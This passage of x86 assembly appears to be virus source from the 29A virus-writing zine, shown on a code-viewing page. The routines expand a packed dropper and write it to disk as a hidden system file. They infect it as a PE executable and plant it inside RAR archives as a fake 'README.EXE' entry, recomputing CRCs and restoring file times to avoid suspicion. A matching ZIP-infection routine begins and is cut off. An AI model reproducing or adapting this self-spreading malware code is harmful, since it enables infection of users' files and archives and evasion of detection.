📄 29a-7.006
字号:
ret
; uncompress the dropper and infect it
dropTheVirus:
xor ecx,ecx ; expand the RLEed
mov edx,2570 ; dropper
lea esi,[drop+ebp]
lea edi,[dropExp+ebp]
expandLoop:
test byte [esi],128
jnz expRep
mov cl,byte [esi]
and cl,127
sub edx,ecx
inc esi
rep movsb
or edx,edx
jnz expandLoop
jmp endExpand
expRep:
mov cl,byte [esi]
inc esi
lodsb
and cl,127
sub edx,ecx
rep stosb
or edx,edx
jnz expandLoop
endExpand:
xor eax,eax
push eax
push dword 00000007h ; system, read only and hidden
push dword 00000001h
push eax
push eax
push dword 40000000h
lea esi,[dropName+ebp] ; that must be initialized
push esi ; before use it!
call dword [_CreateFileA+ebp]
inc eax
jz skipDrop
dec eax
push eax
push dword 0
lea esi,[dummy+ebp]
push esi
push dword 2570
lea esi,[dropExp+ebp]
push esi
push eax
call dword [_WriteFile+ebp]
call dword [_CloseHandle+ebp]
lea esi,[dropName+ebp]
call infectpe
skipDrop:
ret
; adds the dropper to a RAR archive pointed by esi
infectRAR:
push esi
push esi
call dword [_GetFileAttributesA+ebp]
pop esi
inc eax
jz near infectionErrorRAR
dec eax
mov dword [fileAttrib+ebp],eax
push esi
push dword 80h
push esi
call dword [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz near infectionErrorRAR
push esi
xor eax,eax
push eax
push dword 80h
push dword 3
push eax
push eax
push dword (80000000h | 40000000h)
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorAttribRAR
dec eax
mov [fHnd+ebp],eax
push dword 0
push eax
call dword [_GetFileSize+ebp]
inc eax
jz near infectionErrorCloseRAR
dec eax
mov [fileSize+ebp],eax
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_GetFileTime+ebp]
or eax,eax
jz near infectionErrorCloseRAR
xor eax,eax
push eax
push eax
push eax
push dword 4
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorCloseRAR
mov dword [fhmap+ebp],eax
xor eax,eax
push eax
push eax
push eax
push dword 6
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMapRAR
mov [mapMem+ebp],eax
; don't rely too much on next part XD
; using RAR32 for tests
mov edx,[eax]
not edx
cmp edx,~"Rar!" ; a RAR archive?
jne near infectionErrorCloseMapRAR
add eax,14h ; skip main header
cmp byte [eax+2],74h ; a RAR header?
jne near infectionErrorCloseMapRAR
mov edx,[eax+RARName-RARHeader] ; check if already
not edx ; infected
cmp edx,~"READ"
jne RARNotFound
mov edx,[eax+RARName-RARHeader+4]
not edx
cmp edx,~"ME.E"
je near infectionErrorCloseMapRAR
RARNotFound:
; The RAR file seems ok and it's not infected
mov dx,[eax+RARFileTime-RARHeader] ; less suspicious
mov [RARFileTime+ebp],dx
mov dx,[eax+RARFileDate-RARHeader]
mov [RARFileDate+ebp],dx
mov dl,[eax+RAROs-RARHeader] ; same os
mov [RAROs+ebp],dl
; now load our droper
xor eax,eax
push eax
push dword 00000007h
push dword 00000003h
push eax
push eax
push dword 80000000h
lea esi,[dropName+ebp] ; our dropper
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorCloseMapRAR
dec eax
push eax
push dword 0
push eax
call dword [_GetFileSize+ebp]
pop ebx
inc eax
jz near infectionErrorCloseMapRAR
dec eax
add [fileSize+ebp],eax ; new size
add dword [fileSize+ebp],FinRARHeader-RARHeader
mov [RARCompressed+ebp],eax ; update RAR header
mov [RAROriginal+ebp],eax
push ebx
xor eax,eax
push eax
push eax
push eax
push dword 2
push eax
push ebx
call dword [_CreateFileMappingA+ebp]
pop ebx
or eax,eax
jz near infectionErrorCloseMapRAR
push ebx
push eax
mov ebx,eax
xor eax,eax
push eax
push eax
push eax
push dword 4
push ebx
call dword [_MapViewOfFile+ebp]
pop edx
pop ebx
or eax,eax
jz near infectionErrorCloseMapRAR
push ebx ; file hnd
push edx ; file mapping
push eax ; map view of file
mov esi,eax
mov edi,[RAROriginal+ebp]
call CRC32
mov [RARCrc32+ebp],eax
lea esi,[RARHeader+2+ebp]
mov edi,FinRARHeader-RARHeader-2
call CRC32
mov [RARHeaderCRC+ebp],ax
push dword [mapMem+ebp]
call dword [_UnmapViewOfFile+ebp]
push dword [fhmap+ebp]
call dword [_CloseHandle+ebp]
pop dword [wideBuffer+ebp] ; view of file
pop dword [wideBuffer+4+ebp]; file mapping
pop dword [wideBuffer+8+ebp]; file handle
xor eax,eax
push eax
push dword [fileSize+ebp]
push eax
push dword 4
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorCloseRAR
mov [fhmap+ebp],eax
xor eax,eax
push dword [fileSize+ebp]
push eax
push eax
push dword 6
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMapRAR
mov [mapMem+ebp],eax
mov edi,eax
add edi,[fileSize+ebp] ; end of file
mov esi,eax
add esi,14h ; begin of data
add esi,FinRARHeader-RARHeader ; plus added size
add esi,[RAROriginal+ebp]
mov ecx,edi ; size of data to move
sub ecx,esi
mov esi,edi
sub esi,FinRARHeader-RARHeader
sub esi,[RAROriginal+ebp]
dec esi
dec edi
moveLoopRAR: ; move the data
lodsb
sub esi,2
stosb
sub edi,2
dec ecx
jnz moveLoopRAR
mov edi,[mapMem+ebp] ; insert our data
add edi,14h
lea esi,[RARHeader+ebp]
mov ecx,FinRARHeader-RARHeader
rep movsb
mov esi,[wideBuffer+ebp]
mov ecx,[RAROriginal+ebp]
rep movsb
push dword [wideBuffer+ebp]
call dword [_UnmapViewOfFile+ebp]
push dword [wideBuffer+4+ebp]
call dword [_CloseHandle+ebp]
push dword [wideBuffer+8+ebp]
call dword [_CloseHandle+ebp] ; dropper released
infectionErrorCloseUnmapRAR:
push dword [mapMem+ebp]
call dword [_UnmapViewOfFile+ebp]
infectionErrorCloseMapRAR:
push dword [fhmap+ebp]
call dword [_CloseHandle+ebp]
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_SetFileTime+ebp]
infectionErrorCloseRAR:
push dword [fHnd+ebp]
call dword [_CloseHandle+ebp]
infectionErrorAttribRAR:
pop esi
push dword [fileAttrib+ebp]
push esi
call dword [_SetFileAttributesA+ebp]
infectionErrorRAR:
ret
; adds the dropper to a ZIP archive pointed by esi
infectZIP:
push esi
push esi
call dword [_GetFileAttributesA+ebp]
pop esi
inc eax
jz near infectionErrorZIP
dec eax
mov dword [fileAttrib+ebp],eax
push esi
push dword 80h
push esi
call dword [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz near infectionErrorZIP
push esi
xor eax,eax
push eax
push dword 80h
push dword 3
push eax
push eax
push dword (80000000h | 40000000h)
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorAttribZIP
dec eax
mov [fHnd+ebp],eax
push dword 0
push eax
call dword [_GetFileSize+ebp]
inc eax
jz near infectionErrorCloseZIP
dec eax
mov [fileSize+ebp],eax
mov [dummy+ebp],eax ; required later
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_GetFileTime+ebp]
or eax,eax
jz near infectionErrorCloseZIP
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -